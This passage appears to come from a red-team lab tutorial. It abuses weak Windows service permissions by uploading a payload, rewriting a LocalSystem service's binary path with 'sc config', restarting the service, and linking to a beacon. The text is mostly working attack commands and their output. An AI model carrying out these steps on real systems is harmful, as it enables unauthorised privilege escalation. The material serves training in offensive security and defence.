However, it doesn't show exactly what the permissions are, so we need to dig a little deeper. This PowerShell script will print which service rights we have.
We can see that all Authenticated Users have ChangeConfig, Start and Stop privileges over this service. We can abuse these weak permissions by changing the binary path of the service - so instead of it running C:\Program Files\Vulnerable Services\Service 2.exe, we can have it run something like C:\Temp\payload.exe.
First - validate that the current path is "C:\Program Files\Vulnerable Services\Service 2.exe" (also note that the path is quoted).
Next, upload a service binary payload and reconfigure the binary path on the vulnerable service.
beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
[SC] ChangeServiceConfig SUCCESS
\
The space after binPath= is intentional as this is how it's documented in sc's help documentation.
\
Validate that the path has indeed been updated.
beacon> run sc qc VulnService2
SERVICE_NAME: Vuln-Service-2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Temp\tcp-local_x64.svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VulnService2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
\
Because the service is currently running (as can be seen with sc query VulnService2), we must stop and then start the service to execute our malicious binary.
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444
[+] established link to child beacon: 10.10.123.102
The additional set of escaped quotes is necessary to ensure that the path remains fully quoted, otherwise you could introduce a new unquoted service path vulnerability.